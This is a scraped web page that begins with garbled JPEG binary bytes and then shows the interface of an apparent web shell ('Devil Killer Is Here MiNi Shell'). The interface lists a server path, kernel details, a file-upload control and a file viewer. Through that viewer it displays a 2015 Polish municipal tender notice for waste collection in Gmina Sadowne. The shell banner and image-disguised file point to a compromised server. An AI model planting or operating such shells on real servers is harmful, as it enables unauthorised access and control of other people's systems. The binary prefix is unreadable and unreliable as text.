JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151118/168941-N-2015.html

<p class="kh_header"><b>Sadowne: Odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości, 
na których zamieszkują mieszkańcy w Gminie Sadowne</b><br>
<b>Numer ogłoszenia: 168941 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Sadowne , ul. Kościuszki 3, 07-140 Sadowne, woj. mazowieckie, tel. 025 6753251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.sadowne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości, 
na których zamieszkują mieszkańcy w Gminie Sadowne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest:
- odbieranie i zagospodarowanie odpadów komunalnych, wykazanych w tabeli 1, powstałych i zbieranych z nieruchomości na których zamieszkują mieszkańcy, położonych w granicach administracyjnych Gminy Sadowne,
- transport odpadów do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK) wskazanej w Wojewódzkim Planu Gospodarki Odpadami Komunalnymi
- osiągnięcie poziomów określonych w Rozporządzeniu Ministra Środowiska z dnia
29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego
użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.
U. z 2012 r. poz. 645) oraz osiągnięcie poziomów określonych w Rozporządzeniu
Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia
masy odpadów komunalnych ulegających biodegradacji przekazywanych do
składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów
(Dz. U. z 2012 r. poz. 676),
- dostarczenie i ciągłe zapewnienie właścicielom nieruchomości, na których zamieszkują mieszkańcy zakupionych na własny koszt worków do gromadzenia odpadów segregowanych i niesegregowanych, 
- odbieranie i zagospodarowanie odpadów komunalnych dostarczanych do Punktu
Selektywnego Zbierania Odpadów Komunalnych przez właścicieli nieruchomości
Zamieszkałych.
2) Powierzchnia gminy Sadowne wynosi 145 km2 (14472 ha). Liczba zameldowanych
mieszkańców gminy wynosi 6068 (wg ewidencji ludności, stan na dzień 31.12.2014 r.). W skład Gminy Sadowne wchodzi 23 sołectwa: Bojewo, Grabiny, Kocielnik, Kołodziąż, Kołodziąż Rybie, Krupińskie, Morzyczyn Włościański, Morzyczyn Włóki, Ocięte, Orzełek, Płatkownica, Rażny, Sadowne, Sokółka, Sadoleś, Sojkówek, Szynkarzyzna, Wilczogęby, Zalesie, Zieleniec, Zarzetka, Złotki, Kolonia Złotki. 
Tabela 1. Rodzajów odpadów stanowiących przedmiot zamówienia odbierane bezpośrednio od mieszkańców Gminy.
Rodzaje odpadów	Kolor worka
komunalne odpady zmieszane (20 03 01)czarny
papier i tektura (15 01 01), (20 01 01)niebieski3metale (15 01 04), (20 01 40), opakowania wielomateriałowe (15 01 05)fioletowy
tworzywa sztuczne (15 01 02), (20 01 39)żółty
szkło (15 01 07), (20 01 02) zielony
odpady komunalne ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji i odpady zielone (20 01 08), (20 02 01), (15 01 01) brązowy
popiół (20 01 99)	szary
3) Na terenie gminy Sadowne zlokalizowanych jest około 1625 nieruchomości o zabudowie jednorodzinnej, na których zamieszkują mieszkańcy. Szczegółowy wykaz tych nieruchomości, z adresem i ilością osób zostanie Wykonawcy przedstawiony jako załącznik do umowy 
4) Na terenie gminy Sadowne zlokalizowanych jest 6 nieruchomości o zabudowie wielolokalowej, na których zamieszkują mieszkańcy. Szczegółowy wykaz tych nieruchomości zostanie Wykonawcy przedstawiony jako załącznik do umowy. 
5) Szacowana ilość odpadów będących przedmiotem zamówienia, zgodnie z najlepszą wiedzą Zamawiającego wynosi 519,40 Mg i została oparta na informacjach i analizach za okres styczeń 2014r. - grudzień 2014 r. które pochodzą z miesięcznych informacji przekazywanych Wójtowi Gminy Sadowne przez firmę odbierającą odpady komunalne od właścicieli nieruchomości zamieszkałych na terenie gminy Sadowne, i które to w poszczególnych rodzajach odpadów przedstawiają się następująco:
20 03 01 -  Niesegregowane odpady komunalne - 233,00 Mg,15 01 07 - Opakowania ze szkła -  93,1 Mg, 15 01 01 - Opakowania z papieru i tektury -  33,8 Mg,15 01 02 - Opakowania z tworzyw sztucznych - 94,0 Mg,15 01 06 - Zmieszane odpady opakowaniowe - 29,6 Mg,20 01 99 - Inne niewymienione frakcje zbierane w sposób selektywny (popiół) -19,6 Mg,20 01 23 - Urządzenia zawierające freony - 0,5 Mg
20 01 35 - Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki - 1,0 Mg, 20 03 07 - Odpady wielkogabarytowe - 11,7 Mg,16 01 03 - Zużyte opony -3,1 Mg
Wskazane powyżej dane mają charakter czysto informacyjny.
3.2. Odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy.
3.2.1. Rodzaj i ilość odpadów.
1) Miejsce świadczenia usługi: obszar Gminy Sadowne, w skład którego wchodzą miejscowości: Bojewo, Grabiny, Kołodziąż, Kołodziąż Rybie, Krupińskie, Morzyczyn Włościański, Morzyczyn Włóki, Ocięte, Orzełek, Płatkownica, Rażny, Sadowne, Sokółka, Sadoleś, Sojkówek, Szynkarzyzna, Wilczogęby, Zalesie, Zieleniec, Zarzetka, Złotki, Kolonia Złotki.
2) Usługa odbierania i zagospodarowania odpadów komunalnych od właścicieli
nieruchomości z terenu Gminy Sadowne obejmuje:
a) odbieranie odpadów komunalnych, wymienionych w Tabeli 1, od wszystkich właścicieli nieruchomości, na których zamieszkują mieszkańcy zgodnie z bazami nieruchomości udostępnionymi Wykonawcy, stanowiącymi załączniki do umowy; 
b) odbieranie i zagospodarowanie odpadów komunalnych dostarczanych w formie mobilnego Punktu Selektywnego Zbierania Odpadów Komunalnych przez właścicieli nieruchomości Zamieszkałych.
Rodzaj odbieranych odpadów komunalnych w Punkcie Selektywnego Zbierania Odpadów (w ramach zamówienia wykonawca zorganizuje 2 razy do roku jeden termin na wiosnę drugi na jesień odbiór odpadów wystawionych przez właścicieli przed swoimi nieruchomościami w wyznaczonych w harmonogramie terminach):
1) przeterminowane leki,
2) chemikalia,
3) zużyte baterie i akumulatory,
4) zużyty sprzęt elektryczny i elektroniczny,
5) odpady wielkogabarytowe,
6) zużyte opony,
7) odpady budowlane i rozbiórkowe
c) zagospodarowanie zebranych odpadów komunalnych w sposób zgodny 
z hierarchią postępowania z odpadami, o której mowa w art. 17 i 18 ustawy 
z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późn.zm.) lub
samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami;
3.2.2. Sposób odbierania odpadów komunalnych.
1) Wykonawca jest zobowiązany do odbierania odpadów komunalnych:
a)w sposób ciągły, nie zakłócający spoczynku nocnego,
b)w terminach wynikających z przyjętego harmonogramu odbioru,
c)niezależnie od warunków atmosferycznych,
d)pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów,
w sposób wykluczający mieszanie odpadów.
2)Wykonawca zobowiązany jest do odbierania wszystkich odpadów komunalnych
określonych w tabeli nr 1 wytworzonych na terenie wszystkich nieruchomości, na których zamieszkują mieszkańcy, zgromadzonych w workach spełniających minimalne wymagania określone w Regulaminie utrzymania czystości i porządku na terenie Gminy Sadowne.
3) W przypadku, gdy odpady nie są gromadzone w workach odpowiadającym wymaganiom Regulaminu utrzymania czystości i porządku na terenie Gminy Sadowne, Wykonawca obowiązany jest do ich odbierania oraz poinformowania Zamawiającego o nieruchomości, na której odpady nie są gromadzone w sposób odpowiadający wymaganiom Regulaminu.
4) Wykonawca obowiązany jest dostarczać właścicielom nieruchomości, na których
zamieszkują mieszkańcy zakupione na własny koszt worki do gromadzenia odpadów segregowanych i niesegregowanych z tym, że wyposażenie po raz pierwszy w worki na odpady musi nastąpić najpóźniej 5 dni przed planowaną pierwszą zbiórką odpadów.:
a)dostarczane worki powinny spełniać wymagania określone w Rozdziale 3
Regulaminu utrzymania czystości i porządku na terenie Gminy Sadowne,
b)ilość dostarczanych właścicielom nieruchomości worków na odpady powinna
wynikać z faktycznego zapotrzebowania,
c)Wykonawca dostarczy worki na każdą nieruchomość, wyszczególnioną 
w załączniku do umowy,
d)podczas wykonywania czynności odbierania odpadów gromadzonych 
w sposób selektywny i nieselektywny od właścicieli nieruchomości Wykonawca dostarcza worki odpowiednio oznaczone w ilości zgodnej z ilością worków odebranych z nieruchomości,
e)w przypadku, gdy dostarczona ilość worków lub ich łączna pojemność okaże
się niewystarczająca w danym okresie czasu właściciel nieruchomości
powinien mieć możliwość bezpłatnego dobrania worków we wskazanym miejscu przez Wykonawcę.
Worki do selektywnej zbiorki odpadów komunalnych powinny być: wykonane z folii LDPE o grubości 60?m zapewniającej odporność na rozerwanie; o pojemności 120 l; bez dodatku kadmu, ołowiu i innych pierwiastków szkodliwych dla środowiska; odporne na działanie promieni UV, niskich temperatur oraz środków chemicznych; półprzezroczyste, umożliwiające wizualną kontrolę zawartości; odpowiednio oznaczone nazwa frakcji 
i opatrzone instrukcją segregowania odpadów.
5)Wykonawca obowiązany jest do zbierania i odbierania odpadów z miejsc
gromadzenia odpadów (altanek śmietnikowych), również w przypadku, gdy ich
wysypanie nie nastąpiło w trakcie odbierania.
6)Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemników na odpady wynikłe z winy Wykonawcy, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy.
3.2.3. Częstotliwość odbierania odpadów od właścicieli nieruchomości zamieszkanych 
harmonogram.
1) Wymaga się, aby Wykonawca zapewnił odbieranie odpadów z częstotliwością
określoną w przepisach uchwały Nr XXVI/174/2013 Rady Gminy Sadowne z dnia 28 maja 2013 roku w sprawie określenie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (Dziennik Urzędowy Woj. Mazowieckiego z 2013 roku, pozycja 6672) 
a mianowicie:
a) odpady zmieszane (niesegregowane i pozostałości po segregacji) - co najmniej 2 razy w miesiącu;
b) odpady selektywnie zbierane - co najmniej jeden raz w miesiącu
-odpady ulegające biodegradacji, w tym odpady zielone  - co najmniej jeden raz w miesiącu
Zamawiający określa odbiór odpadów SEGREGOWANYCH - 2 razy w miesiącu.
2) Wykonawca zobowiązany jest do opracowania harmonogramu odbierania
odpadów, z uwzględnieniem poszczególnych rodzajów odpadów oraz wymagań
określonych w uchwale nr XXVI/174/2013 Rady Gminy Sadowne z dnia 28 maja 2013 roku w sprawie określenie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (Dziennik Urzędowy Woj. Mazowieckiego z 2013 roku, pozycja 6672) 
w szczególności biorąc pod uwagę, iż odbiór odpadów nie może następować w dniu ustawowo wolnym od pracy.
3) Harmonogram obejmujący okres od dnia 1 stycznia 2016 r. do dnia 31 grudnia 2016 r. powinien zostać opracowany i przedłożony Zamawiającemu w terminie 7 dni od podpisania umowy.
4) Harmonogram powinien być sporządzony zgodnie z następującymi wytycznymi:
a)odbiór odpadów NIESEGREGOWANYCH i SEGREGOWANYCH w ten sam dzień  - 2 razy w miesiącu.
b)w przypadku, gdy w ustalony dzień tygodnia lub miesiąca dla odbioru odpadów
przypada dzień ustawowo wolny od pracy, Wykonawca zapewni odbiór odpadów
w pierwszym następującym po nim dniu nie będącym dniem ustawowo wolnym od pracy.
c)odbiór odpadów w formie mobilnego punktu selektywnej zbiórki powinien odbywać się dwa razy w roku (kwiecień, październik) zgodnie z harmonogramem wykonanym przez Wykonawcę, uzgodnionym z Zamawiającym i zaakceptowanym przez Zamawiającego. 
5) Zadaniem Wykonawcy jest takie sporządzenie Harmonogramu zapewniające
regularność i powtarzalność odbierania, by mieszkańcy mogli w łatwy sposób
zaplanować przygotowanie odpadów do odebrania.
6) Harmonogram ponadto:
a) powinien być sporządzony na cały rok kalendarzowy 2016, sformułowany w sposób przejrzysty, jasny, pozwalający na szybkie zorientowanie się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów poszczególnych rodzajów;
b) nie powinien zawierać żadnych dodatkowych treści ponad informacje związane 
z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd.
c) powinien wskazywać na daty odbierania poszczególnych rodzajów odpadów 
z nieruchomości.
7) Wykonawca powinien umieścić harmonogram na własnej stronie internetowej, 
w terminie 5 dni od daty zatwierdzenia przez Zamawiającego i eksponować go przez
cały okres trwania umowy. Zamawiający umieści harmonogram na własnej stronie internetowej.
8) Wykonawca jest zobowiązany do przekazania harmonogramu właścicielom
nieruchomości, w terminie 7 dni od daty zatwierdzenia przez Zamawiającego, 
9) Harmonogram przygotowany na wymagany okres obowiązuje do końca roku na
który został ustalony. W przypadku nieprzewidzianych okoliczności, za zgodą
Zamawiającego, dopuszcza się zmianę terminu odbioru odpadów. Wykonawca
odpowiedzialny jest w takim przypadku za bieżące poinformowanie Zamawiającego 
w sposób określony w umowie oraz informowanie właścicieli nieruchomości o zmianie.
10) Harmonogram co do treści i formy wymaga zatwierdzenia przez Zamawiającego.
Wykonawca przekazuje Zamawiającemu projekt harmonogramu w formie pliku PDF bez zabezpieczeń i haseł. Zamawiający zaakceptuje harmonogram lub przedstawi uwagi do niego w terminie 2 dni od jego otrzymania. Wykonawca w terminie 2 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji. Zatwierdzenie poprawionego harmonogramu nastąpi w terminie 2 dni od daty dostarczenia.
3.2.4. Sposób zagospodarowania odpadów.
Wykonawca jest zobowiązany do:
1) przekazywania odebranych od właścicieli nieruchomości, na których zamieszkują mieszkańcy odpadów komunalnych zmieszanych i odpadów komunalnych ulegających biodegradacji do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających z wojewódzkiego planu gospodarki odpadami komunalnymi. W przypadku awarii instalacji regionalnej, o której mowa powyżej, bądź w stanach odbiegających od
normalnej eksploatacji, dopuszcza się skierowanie strumienia odpadów do instalacji do przetwarzania odpadów komunalnych o statusie zastępczej RIPOK.
2) przekazywanie odbieranych od właścicieli nieruchomości, na których zamieszkują mieszkańcy selektywnie zbieranych odpadów komunalnych do instalacji odzysku 
i unieszkodliwienia odpadów, zgodnie z hierarchią postępowanie z odpadkami, o której mowa w art. 17 i 18 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późn.zm.) lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami,
3) prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami.
3.3. Osiągnięcie poziomów recyklingu i przygotowania do ponownego użycia i odzysku.
Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia 
i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645) poziomów recyklingu, przygotowania do ponownego użycia i odzysku następujących frakcji odpadów: papieru, metali, tworzyw sztucznych i szkła.
2) Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia 
i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645) poziomów recyklingu, przygotowania do ponownego użycia i odzysku następujących frakcji odpadów: innych niż niebezpieczne odpadów budowlanych i rozbiórkowych.
3) Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne ulegające biodegradacji w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676) poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania.
4) Osiągane przez Wykonawcą poziomy recyklingu, przygotowania do ponownego
użycia i odzysku, o których mowa w ust. 1 i 2, obliczane będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645).
5) Osiągnięty przez Wykonawcę poziom ograniczenia masy odpadów komunalnych
ulegających biodegradacji przekazywanych do składowania, o którym mowa w ust.
3, obliczany będzie na podstawie wzorów zawartych w Rozporządzeniu Ministra
Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676)
6) W celu osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia 
i odzysku wskazanych frakcji odpadów, oraz poziomu ograniczenia składowania
odpadów ulegających biodegradacji Wykonawca zobowiązany jest do
maksymalnego ułatwienia właścicielom nieruchomości pozbywania się odpadów
papieru, metali, tworzyw sztucznych, szkła i odpadów ulegających biodegradacji
powstających na terenie nieruchomości zamieszkałych, m.in. poprzez: odbieranie
w/w odpadów zebranych w sposób selektywny u źródła.
7) Wykonawca może prowadzić działania mające na celu osiągnięcie ww. poziomów
recyklingu, przygotowania do ponownego użycia i odzysku, a także ograniczania
składowania odpadów zielonych ulegających biodegradacji, w szczególności przez
umożliwienie właścicielom nieruchomości wynajmu, dzierżawy lub innej formy
dysponowania pojemnikami do zbierania odpadów komunalnych, jeżeli zgłoszą
oni taką potrzebę na podstawie odrębnych umów (bez ponoszenia kosztów przez
Zamawiającego); Zamawiający nie przekaże wykazu właścicieli nieruchomości celem zawarcia przez Wykonawcę umów cywilnych na ww usługi;
3.4. Wymagania ogólne co do sposobu odbierania odpadów z nieruchomości.
1) Wykonawca obowiązany jest do odbierania odpadów w sposób zapewniający
utrzymanie odpowiedniego stanu sanitarnego, w szczególności do:
a)	zapobieganie wysypywaniu się odpadów z pojemników i worków podczas
dokonywania odbioru,
b)	uprzątnięcie i odbieranie odpadów z miejsc ich gromadzenia, w tym także
tych, które nie zostały umieszczone w pojemnikach (workach).
c)	odstawienie pojemnika po opróżnieniu w miejsce z którego został odebrany.
2) Wykonawcę obowiązuje:
d)	zakaz mieszania selektywnie zbieranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości,
e)	zakaz mieszania ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych,
f)	zabezpieczenie przewożonych odpadów przed wysypaniem w trakcie transportu; 
w przypadku wysypania Wykonawca obowiązany jest do natychmiastowego uprzątnięcia odpadów oraz skutków ich wysypania (zabrudzeń, plam, itd.).
3) Wykonawca ponosi odpowiedzialność za zniszczenie lub uszkodzenie worków/pojemników do gromadzenia odpadów należących do właścicieli nieruchomości, powstałych w związku z realizacją Przedmiotu Umowy, na zasadach określonych w Kodeksie cywilnym.
4) Wykonawca zobowiązany jest do wykonywania przedmiotu zamówienie zgodnie zobowiązującymi przepisami ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r., poz. 1232 z późn.zm ) oraz Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122),
5) Wykonawca zobowiązany jest do wykonywania usługi odbioru i transportu
odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów
komunalnych będzie utrudniony z powodu prowadzonych remontów dróg,
dojazdów, innych utrudnień w ruchu, warunków atmosferycznych itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy, 
6) Wykonawca zobowiązany jest do okazania, na żądanie Zamawiającego, wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa, 
7) Wykonawca ponosi odpowiedzialności wobec Zamawiającego i osób trzecich 
za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku 
z realizacją przedmiotu umowy w zakresie określonym w Kodeksie cywilnym i innych ustawach.
8) Wykonawca zobowiązany jest do rejestrowania przebiegu pracy pojazdów w terenie za pomocą systemu GPS.
3.5. Warunki techniczne wymagane przy wykonywaniu przedmiotu zamówienia.
1)Zamawiający wymaga, aby przez cały okres realizacji umowy Wykonawca
dysponował pojazdami wskazanymi w Tabeli 2,
2)Pojazdy powinny być w pełni sprawne, posiadać aktualne badania techniczne, być dopuszczone do ruchu oraz oznakowane widoczna nazwą przedsiębiorcy 
i numerem jego telefonu.
3)W razie awarii pojazdu Wykonawca zobowiązany jest zapewnić pojazd zastępczy o zbliżonych parametrach.
4)Pojazdy do odbierania odpadów komunalnych zmieszanych powinny spełniać wymagania Dyrektywy 98/69/EC - norm Euro 3.
5)Pojazdy do odbierania odpadów komunalnych powinny być dostosowane do warunków drogowych tj. drogami gruntowymi powinny poruszać się pojazdy o masie całkowitej poniżej 6 ton.
Tabela 2: Wymagane ilości i rodzaje pojazdów
Rodzaj pojazdów	Wymagana ilość pojazdów
- Pojazd bezpylny z funkcją kompaktującą	 1 szt.
- Pojazdy przystosowane do odbierania
selektywnie zebranych odpadów komunalnych	2 szt.
3.6. Raporty i inne obowiązki informacyjne.
3.6.1. Raporty miesięczne.
1. Wykonawca jest zobowiązany do niezwłocznego przekazywania Zamawiającemu miesięcznych raportów zawierających informacje o:
a.	ilości odebranych odpadów zmieszanych [Mg],
b.	ilości odebranych odpadów szkła [Mg],
c.	ilości odebranych odpadów papieru [Mg],
d.	ilości odebranych odpadów metali [Mg],
e.	ilości odebranych odpadów opakowań wielomateriałowych [Mg],
f.ilości odebranych odpadów tworzyw sztucznych[Mg],
g.ilości odebranych odpadów ulegających biodegradacji, w tym odpadów opakowaniowych ulegających biodegradacji [Mg], 
h.adresach nieruchomości, na których odpady gromadzone są w sposób niezgodny 
z Regulaminem utrzymania czystości i porządku ma terenie Gminy Sadowne,
i.masie odpadów powstałych po mechaniczno - biologicznym przetworzeniu zmieszanych odpadów komunalnych o kodzie 19 12 12, przekazanych do składowania,
j.	adresach nieruchomości, na których odpady gromadzone są w sposób
niezgodny z Regulaminem utrzymania czystości i porządku na terenie Gminy Sadowne,
k.	masie odpadów powstałych po mechaniczno - biologicznym przetworzeniu
